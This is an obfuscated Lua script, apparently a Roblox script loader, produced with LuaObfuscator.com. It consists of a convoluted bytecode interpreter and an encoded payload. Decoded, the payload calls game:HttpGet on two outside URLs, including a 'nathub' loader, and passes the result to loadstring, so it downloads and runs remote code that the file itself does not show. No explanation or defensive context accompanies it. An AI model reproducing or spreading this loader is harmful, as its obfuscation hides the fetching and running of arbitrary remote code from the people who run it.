--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=v2(v0(v30,16));if v19 then local v112=v5(v90,v19);v19=nil;return v112;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/(((962 -(892 + 65)) -3)^(v32-(2 -1))))%((3 -1)^(((v33-((4 -2) -1)) -(v32-(1 + 0))) + (620 -(555 + 64)))) ;return v91-(v91%(932 -(857 + 74))) ;else local v92=568 -(367 + (371 -170)) ;local v93;while true do if (v92==(927 -(214 + 713))) then v93=(119 -((58 -26) + 85))^(v32-(1 + (350 -(87 + 263)))) ;return (((v31%(v93 + v93))>=v93) and 1) or (0 + 0) ;end end end end local function v21() local v34=(133 + 47) -((266 -199) + 113) ;local v35;while true do if (v34==1) then return v35;end if (v34==((952 -(802 + 150)) + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=2 -1 ;end end end local function v22() local v36=0 -(0 -0) ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * 256) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (999 -(915 + 82)) );v18=v18 + (5 -3) ;v36=1 + 0 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + (1191 -(1069 + 118)) ;return (v42 * (38062656 -21285440)) + (v41 * (143357 -77821)) + (v40 * (45 + 211)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=(2 -1) + 0 ;local v46=(v20(v44,792 -(368 + 423) ,(4 + 58) -42 ) * ((20 -(10 + 8))^(122 -90))) + v43 ;local v47=v20(v44,463 -(416 + 26) ,98 -67 );local v48=((v20(v44,12 + 20 )==(1 + 0)) and  -(1 -0)) or (439 -(145 + 293)) ;if (v47==(430 -(44 + 386))) then if (v46==(1486 -((1883 -(261 + 624)) + 488))) then return v48 * 0 ;else local v113=0;while true do if (v113==(0 + 0)) then v47=1 + 0 ;v45=772 -(201 + 571) ;break;end end end elseif (v47==((5660 -2475) -(116 + 1022))) then return ((v46==((1080 -(1020 + 60)) -0)) and (v48 * ((1 + 0)/((1423 -(630 + 793)) -0)))) or (v48 * NaN) ;end return v8(v48,v47-(3632 -2609) ) * (v45 + (v46/(2^(911 -(814 + 45))))) ;end local function v25(v49) local v50=0;local v51;local v52;while true do if (v50==(3 -(1057 -(87 + 968)))) then v51=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;v50=1 + 1 ;end if ((0 -0)==v50) then v51=nil;if  not v49 then local v121=(1372 + 375) -(760 + 987) ;while true do if (v121==(1913 -(1789 + 124))) then v49=v23();if (v49==(766 -(745 + (92 -71)))) then return "";end break;end end end v50=1 + 0 ;end if (v50==(5 -3)) then v52={};for v114=1, #v51 do v52[v114]=v2(v1(v3(v51,v114,v114)));end v50=11 -8 ;end if (v50==(1 + 2)) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 1551 -(226 + 1325) ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do local v111=(function() return 0 + 0 ;end)();while true do if (v111~=0) then else if (v103==1) then while true do if (v94==(0 + 0)) then v95=(function() return v96();end)();if (v97(v95, #",", #":")~=(0 + 0)) then else local v138=(function() return 0 -0 ;end)();local v139=(function() return;end)();local v140=(function() return;end)();local v141=(function() return;end)();local v142=(function() return;end)();while true do if (v138~=0) then else local v186=(function() return 0;end)();while true do if (v186==0) then v139=(function() return 0;end)();v140=(function() return nil;end)();v186=(function() return 1 -0 ;end)();end if ((1 + 0)~=v186) then else v138=(function() return 1;end)();break;end end end if (v138==(1638 -(1373 + 263))) then while true do if (v139~= #"-19") then else if (v97(v141, #"xnx", #"asd")~= #" ") then else v142[ #"http"]=(function() return v98[v142[ #"asd1"]];end)();end v99[v100]=(function() return v142;end)();break;end if (v139== #"~") then local v195=(function() return 0;end)();local v196=(function() return;end)();while true do if (v195==(1000 -(451 + 549))) then v196=(function() return 0;end)();while true do if (v196==1) then v139=(function() return 1 + 1 ;end)();break;end if (v196~=(0 -0)) then else v142=(function() return {v101(),v101(),nil,nil};end)();if (v140==0) then local v202=(function() return 0;end)();local v203=(function() return;end)();while true do if (v202~=0) then else v203=(function() return 0 -0 ;end)();while true do if (v203==0) then v142[ #"19("]=(function() return v101();end)();v142[ #"http"]=(function() return v101();end)();break;end end break;end end elseif (v140== #"}") then v142[ #"-19"]=(function() return v102();end)();elseif (v140==2) then v142[ #"gha"]=(function() return v102() -(2^16) ;end)();elseif (v140== #"asd") then local v210=(function() return 1384 -(746 + 638) ;end)();local v211=(function() return;end)();while true do if (v210==(0 + 0)) then v211=(function() return 0 -0 ;end)();while true do if (v211~=(341 -(218 + 123))) then else v142[ #"xnx"]=(function() return v102() -(2^(1597 -(1535 + 46))) ;end)();v142[ #"asd1"]=(function() return v101();end)();break;end end break;end end end v196=(function() return 1;end)();end end break;end end end if (v139==2) then local v197=(function() return 0 + 0 ;end)();local v198=(function() return;end)();while true do if ((0 + 0)~=v197) then else v198=(function() return 560 -(306 + 254) ;end)();while true do if (v198==0) then if (v97(v141, #"[", #"{")== #"/") then v142[2]=(function() return v98[v142[2]];end)();end if (v97(v141,2,1 + 1 )~= #"}") then else v142[ #"xnx"]=(function() return v98[v142[ #"91("]];end)();end v198=(function() return 1 -0 ;end)();end if (v198==(1468 -(899 + 568))) then v139=(function() return  #"91(";end)();break;end end break;end end end if (v139~=0) then else local v199=(function() return 0 + 0 ;end)();local v200=(function() return;end)();while true do if (v199~=(0 -0)) then else v200=(function() return 0;end)();while true do if (v200==(604 -(268 + 335))) then v139=(function() return  #"}";end)();break;end if (v200==(290 -(60 + 230))) then v140=(function() return v97(v95,574 -(426 + 146) , #"asd");end)();v141=(function() return v97(v95, #"asd1",1 + 5 );end)();v200=(function() return 1457 -(282 + 1174) ;end)();end end break;end end end end break;end if (v138==(812 -(569 + 242))) then local v187=(function() return 0 -0 ;end)();while true do if (v187==0) then v141=(function() return nil;end)();v142=(function() return nil;end)();v187=(function() return 1;end)();end if (v187==(1 + 0)) then v138=(function() return 1026 -(706 + 318) ;end)();break;end end end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end if (v103~=0) then else local v126=(function() return 1251 -(721 + 530) ;end)();while true do if (v126==0) then v94=(function() return 1271 -(945 + 326) ;end)();v95=(function() return nil;end)();v126=(function() return 2 -1 ;end)();end if (v126==(1 + 0)) then v103=(function() return 1;end)();break;end end end break;end end end end;end)();local v54=(function() return function(v104,v105,v106) local v107=(function() return 700 -(271 + 429) ;end)();local v108=(function() return;end)();while true do if ((0 + 0)~=v107) then else v108=(function() return 1500 -(1408 + 92) ;end)();while true do if (v108~=(1086 -(461 + 625))) then else v104[v105-#"." ]=(function() return v106();end)();return v104,v105,v106;end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"/",v59 do local v69=(function() return 1288 -(993 + 295) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==1) then v72=(function() return nil;end)();while true do if (v70==(1 + 0)) then if (v71== #">") then v72=(function() return v21()~=(1171 -(418 + 753)) ;end)();elseif (v71==(1 + 1)) then v72=(function() return v24();end)();elseif (v71~= #"nil") then else v72=(function() return v25();end)();end v60[v68]=(function() return v72;end)();break;end if (0==v70) then local v125=(function() return 0 + 0 ;end)();while true do if (v125==0) then v71=(function() return v21();end)();v72=(function() return nil;end)();v125=(function() return 1 + 0 ;end)();end if (1==v125) then v70=(function() return 1;end)();break;end end end end break;end if (v69~=(0 + 0)) then else local v116=(function() return 529 -(406 + 123) ;end)();while true do if (v116~=(1770 -(1749 + 20))) then else v69=(function() return 1;end)();break;end if (v116==(0 + 0)) then v70=(function() return 1322 -(1249 + 73) ;end)();v71=(function() return nil;end)();v116=(function() return 1;end)();end end end end end v58[ #"gha"]=(function() return v21();end)();for v73= #"!",v23() do FlatIdent_40CF,Descriptor,v21,v20,v60,v55,v73,v22,v23=(function() return v53(FlatIdent_40CF,Descriptor,v21,v20,v60,v55,v73,v22,v23);end)();end for v74= #"/",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[1147 -(466 + 679) ];local v67=v62[6 -3 ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=2 -(2 -1) ;local v80= -(1901 -(106 + 1262 + 532));local v81={};local v82={...};local v83=v12("#",...) -(217 -(42 + 174)) ;local v84={};local v85={};for v109=0 + 0 ,v83 do if (v109>=v77) then v81[v109-v77 ]=v82[v109 + (2 -1) ];else v85[v109]=v82[v109 + ((2 + 0) -1) ];end end local v86=(v83-v77) + (115 -(4 + 110)) ;local v87;local v88;while true do local v110=1580 -(1183 + 397) ;while true do if (v110==(0 -0)) then v87=v75[v79];v88=v87[585 -(57 + 527) ];v110=1 + 0 ;end if (v110==(1428 -(41 + 1386))) then if (v88<=(108 -(17 + 86))) then if ((713<=847) and (v88<=(2 + 0))) then if (v88<=(0 -0)) then local v128=0 -0 ;local v129;local v130;local v131;local v132;while true do if (v128==(167 -(122 + 44))) then v80=(v131 + v129) -(1 -(0 -0)) ;v132=1661 -(1477 + 184) ;v128=2;end if (v128==(0 -0)) then v129=v87[2 + 0 + 0 ];v130,v131=v78(v85[v129](v13(v85,v129 + 1 + 0 ,v87[5 -2 ])));v128=66 -(30 + 35) ;end if ((2 + 0)==v128) then for v183=v129,v80 do local v184=1257 -(1043 + 214) ;while true do if (v184==(0 -0)) then v132=v132 + (1213 -(323 + 889)) ;v85[v183]=v130[v132];break;end end end break;end end elseif (v88==(2 -1)) then v79=v87[583 -(361 + 219) ];elseif ((2154<=4031) and (v85[v87[322 -(53 + 267) ]]==v87[1 + 3 ])) then v79=v79 + ((577 -(92 + 71)) -(8 + 7 + 398)) ;else v79=v87[1004 -(938 + 63) ];end elseif (v88<=(985 -(18 + (1620 -656)))) then local v133=765 -(574 + 191) ;local v134;local v135;while true do if (v133==((0 + 0) -0)) then v134=v87[2 + 0 ];v135=v85[v87[2 + (2 -1) ]];v133=1 + 0 ;end if ((4615==4615) and (v133==(1139 -(400 + 382 + 356)))) then v85[v134 + (851 -(20 + 830)) ]=v135;v85[v134]=v135[v87[10 -6 ]];break;end end elseif ((v88==(5 -1)) or (3790==500)) then v85[v87[(1943 -(254 + 595)) -(975 + 117) ]]();else v85[v87[2 + 0 ]]=v87[3]~=(126 -(116 + 10)) ;end elseif (v88<=(1 + 7)) then if ((89<221) and (v88<=((146 -(55 + 71)) -14))) then do return;end elseif ((2054>=1421) and (v88>(1025 -(697 + 321)))) then local v145;local v146,v147;local v148;local v149;v85[v87[740 -(542 + 196) ]]=v64[v87[6 -3 ]];v79=v79 + 1 + (0 -0) ;v87=v75[v79];v149=v87[2 + 0 ];v148=v85[v87[2 + 1 ]];v85[v149 + (2 -1) ]=v148;v85[v149]=v148[v87[9 -5 ]];v79=v79 + (1552 -(1126 + 425)) ;v87=v75[v79];v85[v87[(2403 -(573 + 1217)) -(602 + 9) ]]=v87[408 -(118 + 287) ];v79=v79 + ((2417 -1544) -(826 + 46)) ;v87=v75[v79];v85[v87[7 -5 ]]=v87[9 -(1 + 5) ]~=(1121 -(118 + 1003)) ;v79=v79 + (2 -1) ;v87=v75[v79];v149=v87[379 -(142 + 235) ];v146,v147=v78(v85[v149](v13(v85,v149 + (4 -3) ,v87[3])));v80=(v147 + v149) -1 ;v145=0 + 0 ;for v179=v149,v80 do local v180=977 -(553 + 424) ;while true do if ((692<3058) and (v180==(0 -0))) then v145=v145 + 1 + 0 ;v85[v179]=v146[v145];break;end end end v79=v79 + (1 -0) + 0 ;v87=v75[v79];v149=v87[2 + 0 ];v85[v149]=v85[v149](v13(v85,v149 + 1 + 0 ,v80));v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[4 -2 ]]();v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[5 -3 ]]=v64[v87[6 -3 ]];v79=v79 + (215 -(22 + 192)) ;v87=v75[v79];v85[v87[2]]=v64[v87[1 + 2 ]];v79=v79 + ((943 -(714 + 225)) -3) ;v87=v75[v79];v149=v87[2];v148=v85[v87[756 -((698 -459) + 514) ]];v85[v149 + 1 + 0 ]=v148;v85[v149]=v148[v87[1333 -(797 + 532) ]];else for v181=v87[2 + 0 ],v87[2 + (1 -0) ] do v85[v181]=nil;end end elseif ((v88<=(20 -(2 + 9))) or (3254==1655)) then v85[v87[6 -4 ]]=v87[1205 -(373 + 829) ];elseif ((v88==(741 -(476 + 255))) or (1296==4910)) then v85[v87[1132 -(369 + 761) ]]=v64[v87[2 + 1 ]];else local v171=0 -(0 -0) ;local v172;while true do if ((0 -0)==v171) then v172=v87[4 -2 ];v85[v172]=v85[v172](v13(v85,v172 + 1 + 0 ,v80));break;end end end v79=v79 + (239 -(64 + 174)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F416E4D495061715462737943625A52342F726177031D3Q00682Q7470733A2Q2F6765742E6E61746875622E78797A2F6C6F61646572001B3Q0012093Q00014Q0007000100013Q0026023Q0002000100010004013Q00020001001209000100013Q00260200010005000100010004013Q0005000100120A000200023Q001208000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001209000500066Q000300054Q000B00023Q00022Q00040002000100010004013Q001A00010004013Q000500010004013Q001A00010004013Q000200012Q00063Q00017Q00",v9(),...);
